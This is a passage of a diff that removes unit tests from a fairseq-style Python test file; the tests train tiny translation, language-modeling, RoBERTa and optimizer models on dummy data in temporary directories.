dec_ll_flag, - ) - - def test_translation_multi_simple_epoch(self): - # test with all combinations of encoder/decoder lang tokens - encoder_langtok_flags = [ - [], - ["--encoder-langtok", "src"], - ["--encoder-langtok", "tgt"], - ] - decoder_langtok_flags = [[], ["--decoder-langtok"]] - with contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_langtok_flags)): - for j in range(len(decoder_langtok_flags)): - enc_ltok_flag = encoder_langtok_flags[i] - dec_ltok_flag = decoder_langtok_flags[j] - with tempfile.TemporaryDirectory( - f"test_translation_multi_simple_epoch_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data( - data_dir, extra_flags=["--joined-dictionary"] - ) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_no_vepoch(self): - # test with all combinations of encoder/decoder lang tokens - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - 
"--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_dicts(self): - # test with all combinations of encoder/decoder lang tokens - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_src_tgt_dict_spec(self): - # test the specification of explicit --src-dict and --tgt-dict - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--source-dict", - f"{data_dir}/dict.in.txt", - "--target-dict", - f"{data_dir}/dict.out.txt", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_transformer_cross_self_attention(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_cross_self_attention" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--no-cross-attention", - "--cross-self-attention", - ], - run_validation=True, - ) - generate_main(data_dir, extra_flags=[]) - - def 
test_transformer_pointer_generator(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_pointer_generator" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_summarization_data(data_dir) - train_translation_model( - data_dir, - "transformer_pointer_generator", - extra_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--alignment-layer", - "-1", - "--alignment-heads", - "1", - "--source-position-markers", - "0", - ], - run_validation=True, - extra_valid_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - ], - ) - generate_main( - data_dir, - extra_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - ], - ) - - def test_lightconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lightconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lightconv_iwslt_de_en", - [ - "--encoder-conv-type", - "lightweight", - "--decoder-conv-type", - "lightweight", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_dynamicconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_dynamicconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lightconv_iwslt_de_en", - [ - "--encoder-conv-type", - "dynamic", - "--decoder-conv-type", - "dynamic", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_cmlm_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_cmlm_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "cmlm_transformer", - [ - "--apply-bert-init", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--pred-length-offset", - "--length-loss-factor", - "0.1", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_nonautoregressive_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_nonautoregressive_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "nonautoregressive_transformer", - [ - "--apply-bert-init", - "--src-embedding-copy", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--pred-length-offset", - "--length-loss-factor", - "0.1", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "0", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - # def test_nat_crf_transformer(self): - # with contextlib.redirect_stdout(StringIO()): - # with tempfile.TemporaryDirectory('test_nat_crf_transformer') as data_dir: - # create_dummy_data(data_dir) - # preprocess_translation_data(data_dir, ['--joined-dictionary']) - # train_translation_model(data_dir, 'nacrf_transformer', [ - # 
'--apply-bert-init', '--criterion', - # 'nat_loss', '--noise', 'full_mask', '--pred-length-offset', - # '--length-loss-factor', '0.1', - # '--word-ins-loss-factor', '0.5', - # '--crf-lowrank-approx', '1', - # '--crf-beam-approx', '1' - # ], task='translation_lev') - # generate_main(data_dir, [ - # '--task', 'translation_lev', - # '--iter-decode-max-iter', '0', - # '--iter-decode-eos-penalty', '0', - # '--print-step', - # ]) - - def test_iterative_nonautoregressive_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_iterative_nonautoregressive_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "iterative_nonautoregressive_transformer", - [ - "--apply-bert-init", - "--src-embedding-copy", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--stochastic-approx", - "--dae-ratio", - "0.5", - "--train-step", - "3", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_insertion_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_insertion_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "insertion_transformer", - [ - "--apply-bert-init", - "--criterion", - "nat_loss", - "--noise", - "random_mask", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_mixture_of_experts(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_moe") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--task", - "translation_moe", - "--user-dir", - "examples/translation_moe/translation_moe_src", - "--method", - "hMoElp", - "--mean-pool-gating-network", - "--num-experts", - "3", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main( - data_dir, - [ - "--task", - "translation_moe", - "--user-dir", - "examples/translation_moe/translation_moe_src", - "--method", - "hMoElp", - "--mean-pool-gating-network", - "--num-experts", - "3", - "--gen-expert", - "0", - ], - ) - - def test_alignment(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_alignment") as data_dir: - create_dummy_data(data_dir, alignment=True) - preprocess_translation_data(data_dir, ["--align-suffix", "align"]) - train_translation_model( - data_dir, - "transformer_align", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--load-alignments", - "--alignment-layer", - "1", - "--criterion", - "label_smoothed_cross_entropy_with_alignment", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_laser_lstm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_laser_lstm") as data_dir: - laser_config_file = create_laser_data_and_config_json(data_dir) - train_translation_model( - 
laser_config_file.name, - "laser_lstm", - [ - "--user-dir", - "examples/laser/laser_src", - "--weighting-alpha", - "0.3", - "--encoder-bidirectional", - "--encoder-hidden-size", - "512", - "--encoder-layers", - "5", - "--decoder-layers", - "1", - "--encoder-embed-dim", - "320", - "--decoder-embed-dim", - "320", - "--decoder-lang-embed-dim", - "32", - "--save-dir", - data_dir, - "--disable-validation", - ], - task="laser", - lang_flags=[], - ) - - def test_laser_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_laser_transformer") as data_dir: - laser_config_file = create_laser_data_and_config_json(data_dir) - train_translation_model( - laser_config_file.name, - "laser_transformer", - [ - "--user-dir", - "examples/laser/laser_src", - "--weighting-alpha", - "0.3", - "--encoder-embed-dim", - "320", - "--decoder-embed-dim", - "320", - "--decoder-lang-embed-dim", - "32", - "--save-dir", - data_dir, - "--disable-validation", - ], - task="laser", - lang_flags=[], - ) - - def test_alignment_full_context(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_alignment") as data_dir: - create_dummy_data(data_dir, alignment=True) - preprocess_translation_data(data_dir, ["--align-suffix", "align"]) - train_translation_model( - data_dir, - "transformer_align", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--load-alignments", - "--alignment-layer", - "1", - "--criterion", - "label_smoothed_cross_entropy_with_alignment", - "--full-context-alignment", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_transformer_layerdrop(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_layerdrop") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "3", - "--decoder-layers", - "3", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--encoder-layerdrop", - "0.01", - "--decoder-layerdrop", - "0.01", - ], - ) - generate_main(data_dir) - generate_main( - data_dir, - [ - "--model-overrides", - "{'encoder_layers_to_keep':'0,2','decoder_layers_to_keep':'1'}", - ], - ) - - -class TestStories(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv_self_att_wp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_self_att_wp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - config = [ - "--encoder-layers", - "[(128, 3)] * 2", - "--decoder-layers", - "[(128, 3)] * 2", - "--decoder-attention", - "True", - "--encoder-attention", - "False", - "--gated-attention", - "True", - "--self-attention", - "True", - "--project-input", - "True", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - "--multihead-self-attention-nheads", - "2", - ] - train_translation_model(data_dir, "fconv_self_att_wp", config) - generate_main(data_dir) - - # fusion model - os.rename( - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "pretrained.pt"), - ) - config.extend( - [ - "--pretrained", - "True", - "--pretrained-checkpoint", - os.path.join(data_dir, "pretrained.pt"), - "--save-dir", - os.path.join(data_dir, 
"fusion_model"), - ] - ) - train_translation_model(data_dir, "fconv_self_att_wp", config) - - -class TestLanguageModeling(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "fconv_lm", - [ - "--decoder-layers", - "[(850, 3)] * 2 + [(1024,4)]", - "--decoder-embed-dim", - "280", - "--optimizer", - "nag", - "--lr", - "0.1", - ], - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_transformer_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "transformer_lm", - ["--add-bos-token", '--nval', '1'], - run_validation=True, - ) - eval_lm_main(data_dir) - eval_lm_main(data_dir, extra_flags=["--context-window", "25"]) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_transformer_lm_with_adaptive_softmax(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_lm_with_adaptive_softmax" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "transformer_lm", - [ - "--add-bos-token", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - ], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lightconv_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lightconv_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lightconv_lm", - ["--add-bos-token"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lstm_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lstm_lm", - ["--add-bos-token"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lstm_lm_residuals(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_lm_residuals") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lstm_lm", - ["--add-bos-token", "--residuals"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - @unittest.skipIf(not has_hf_transformers, "skip test if transformers is 
missing") - def test_transformer_xl_bptt_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_xl_bptt_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - task_flags = [ - "--user-dir", - "examples/truncated_bptt", - "--task", - "truncated_bptt_lm", - "--batch-size", - "2", - "--tokens-per-sample", - "50", - ] - train_language_model( - data_dir=data_dir, - arch="transformer_xl", - extra_flags=task_flags - + [ - "--n-layer", - "2", - ], - task="truncated_bptt_lm", - run_validation=True, - extra_valid_flags=task_flags, - ) - eval_lm_main(data_dir, extra_flags=task_flags) - # Train with activation offloading - train_language_model( - data_dir=data_dir, - arch="transformer_xl", - extra_flags=task_flags - + [ - "--n-layer", - "2", - "--offload-activations", - ], - task="truncated_bptt_lm", - run_validation=True, - extra_valid_flags=task_flags, - ) - - -class TestMaskedLanguageModel(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_legacy_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_legacy_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_legacy_masked_language_model(data_dir, "masked_lm") - - def test_roberta_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_roberta_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_masked_lm( - data_dir, "roberta_base", extra_flags=["--encoder-layers", "2"] - ) - - def test_roberta_sentence_prediction(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head(data_dir, "roberta_base", num_classes=num_classes) - - def test_roberta_regression_single(self): - num_classes = 1 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_roberta_regression_single" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=["--regression-target"], - ) - - def test_roberta_regression_multiple(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_roberta_regression_multiple" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=["--regression-target"], - ) - - def test_linformer_roberta_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_linformer_roberta_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_masked_lm( - data_dir, - "linformer_roberta_base", - extra_flags=[ - "--user-dir", - "examples/linformer/linformer_src", - "--encoder-layers", - "2", - ], - ) - - def test_linformer_roberta_sentence_prediction(self): - num_classes = 3 - with 
contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_linformer_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=["--user-dir", "examples/linformer/linformer_src"], - ) - - def test_linformer_roberta_regression_single(self): - num_classes = 1 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_linformer_roberta_regression_single" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=[ - "--regression-target", - "--user-dir", - "examples/linformer/linformer_src", - ], - ) - - def test_linformer_roberta_regression_multiple(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_linformer_roberta_regression_multiple" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=[ - "--regression-target", - "--user-dir", - "examples/linformer/linformer_src", - ], - ) - - def _test_pretrained_masked_lm_for_translation(self, learned_pos_emb, encoder_only): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_legacy_masked_language_model( - data_dir, - arch="masked_lm", - extra_args=("--encoder-learned-pos",) if learned_pos_emb else (), - ) - with tempfile.TemporaryDirectory( - "test_mlm_translation" - ) as translation_dir: - create_dummy_data(translation_dir) - preprocess_translation_data( - translation_dir, extra_flags=["--joined-dictionary"] - ) - # Train transformer with data_dir/checkpoint_last.pt - train_translation_model( - translation_dir, - arch="transformer_from_pretrained_xlm", - extra_flags=[ - "--decoder-layers", - "1", - "--decoder-embed-dim", - "32", - "--decoder-attention-heads", - "1", - "--decoder-ffn-embed-dim", - "32", - "--encoder-layers", - "1", - "--encoder-embed-dim", - "32", - "--encoder-attention-heads", - "1", - "--encoder-ffn-embed-dim", - "32", - "--pretrained-xlm-checkpoint", - "{}/checkpoint_last.pt".format(data_dir), - "--activation-fn", - "gelu", - "--max-source-positions", - "500", - "--max-target-positions", - "500", - ] - + ( - ["--encoder-learned-pos", "--decoder-learned-pos"] - if learned_pos_emb - else [] - ) - + (["--init-encoder-only"] if encoder_only else []), - task="translation_from_pretrained_xlm", - ) - - def test_pretrained_masked_lm_for_translation_learned_pos_emb(self): - self._test_pretrained_masked_lm_for_translation(True, False) - - def test_pretrained_masked_lm_for_translation_sinusoidal_pos_emb(self): - self._test_pretrained_masked_lm_for_translation(False, False) - - def test_pretrained_masked_lm_for_translation_encoder_only(self): - self._test_pretrained_masked_lm_for_translation(True, True) - - def test_r4f_roberta(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with 
tempfile.TemporaryDirectory("test_r4f_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=[ - "--user-dir", - "examples/rxf/rxf_src", - "--criterion", - "sentence_prediction_r3f", - "--spectral-norm-classification-head", - ], - ) - - -def train_legacy_masked_language_model(data_dir, arch, extra_args=()): - train_parser = options.get_training_parser() - # TODO: langs should be in and out right? - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "cross_lingual_lm", - data_dir, - "--arch", - arch, - # Optimizer args - "--optimizer", - "adam", - "--lr-scheduler", - "reduce_lr_on_plateau", - "--lr-shrink", - "0.5", - "--lr", - "0.0001", - "--stop-min-lr", - "1e-09", - # dropout, attention args - "--dropout", - "0.1", - "--attention-dropout", - "0.1", - # MLM args - "--criterion", - "legacy_masked_lm_loss", - "--masked-lm-only", - "--monolingual-langs", - "in,out", - "--num-segment", - "5", - # Transformer args: use a small transformer model for fast training - "--encoder-layers", - "1", - "--encoder-embed-dim", - "32", - "--encoder-attention-heads", - "1", - "--encoder-ffn-embed-dim", - "32", - # Other training args - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--dataset-impl", - "raw", - "--num-workers", - "0", - ] - + list(extra_args), - ) - train.main(train_args) - - -class TestOptimizers(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_optimizers(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_optimizers") as data_dir: - # Use just a bit of data and tiny model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - optimizers = ["adafactor", "adam", "nag", "adagrad", "sgd", "adadelta"] - last_checkpoint = os.path.join(data_dir, "checkpoint_last.pt") - for optimizer in optimizers: - if os.path.exists(last_checkpoint): - os.remove(last_checkpoint) - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - optimizer, - ], - ) - generate_main(data_dir) - - -def read_last_log_entry( - logs: List[logging.LogRecord], logger_name: str -) -> Dict[str, float]: - for x in reversed(logs): - if x.name == logger_name: - return json.loads(x.message) - raise ValueError(f"No entries from {logger_name} found in captured logs") - - -class TestActivationCheckpointing(unittest.TestCase): - base_flags = [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--restore-file", - "x.pt", - "--log-format", - "json", - "--log-interval", - "1", - "--max-update", - "2", - ] - - def _train(self, data_dir, extra_flags): - with self.assertLogs() as logs: - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - self.base_flags + extra_flags, - run_validation=True, - extra_valid_flags=["--log-format", "json"], - ) - return logs.records - - def 
test_activation_offloading_does_not_change_metrics(self): - """Neither ----checkpoint-activations nor --offload-activations should change loss""" - with tempfile.TemporaryDirectory("test_transformer_with_act_cpt") as data_dir: - - with self.assertLogs(): - create_dummy_data(data_dir, num_examples=20) - preprocess_translation_data(data_dir) - offload_logs = self._train(data_dir, ["--offload-activations"]) - baseline_logs = self._train(data_dir, []) - - assert len(baseline_logs) == len(offload_logs) - - baseline_valid_stats = read_last_log_entry(baseline_logs, "valid") - offload_valid_stats = read_last_log_entry(offload_logs, "valid") - baseline_train_stats = read_last_log_entry(baseline_logs, "train") - offload_train_stats = read_last_log_entry(offload_logs, "train") - - assert ( - baseline_train_stats["train_loss"] == offload_train_stats["train_loss"] - ) - assert ( - baseline_valid_stats["valid_loss"] == offload_valid_stats["valid_loss"] - ) - - def test_activation_checkpointing_does_not_change_metrics(self): - """--checkpoint-activations should not change loss""" - - with tempfile.TemporaryDirectory("test_transformer_with_act_cpt") as data_dir: - with self.assertLogs(): - create_dummy_data(data_dir, num_examples=20) - preprocess_translation_data(data_dir) - ckpt_logs = self._train(data_dir, ["--checkpoint-activations"]) - baseline_logs = self._train(data_dir, []) - assert len(baseline_logs) == len(ckpt_logs) - - baseline_train_stats = read_last_log_entry(baseline_logs, "train") - ckpt_train_stats = read_last_log_entry(ckpt_logs, "train") - assert baseline_train_stats["train_loss"] == ckpt_train_stats["train_loss"] - - baseline_valid_stats = read_last_log_entry(baseline_logs, "valid") - ckpt_valid_stats = read_last_log_entry(ckpt_logs, "valid") - assert baseline_valid_stats["valid_loss"] == ckpt_valid_stats["valid_loss"] - - -def create_dummy_roberta_head_data( - data_dir, num_examples=100, maxlen=10, num_classes=2, regression=False -): - input_dir = "input0" - - def _create_dummy_data(filename): - random_data = torch.rand(num_examples * maxlen) - input_data = 97 + torch.floor(26 * random_data).int() - if regression: - output_data = torch.rand((num_examples, num_classes)) - else: - output_data = 1 + torch.floor(num_classes * torch.rand(num_examples)).int() - with open(os.path.join(data_dir, 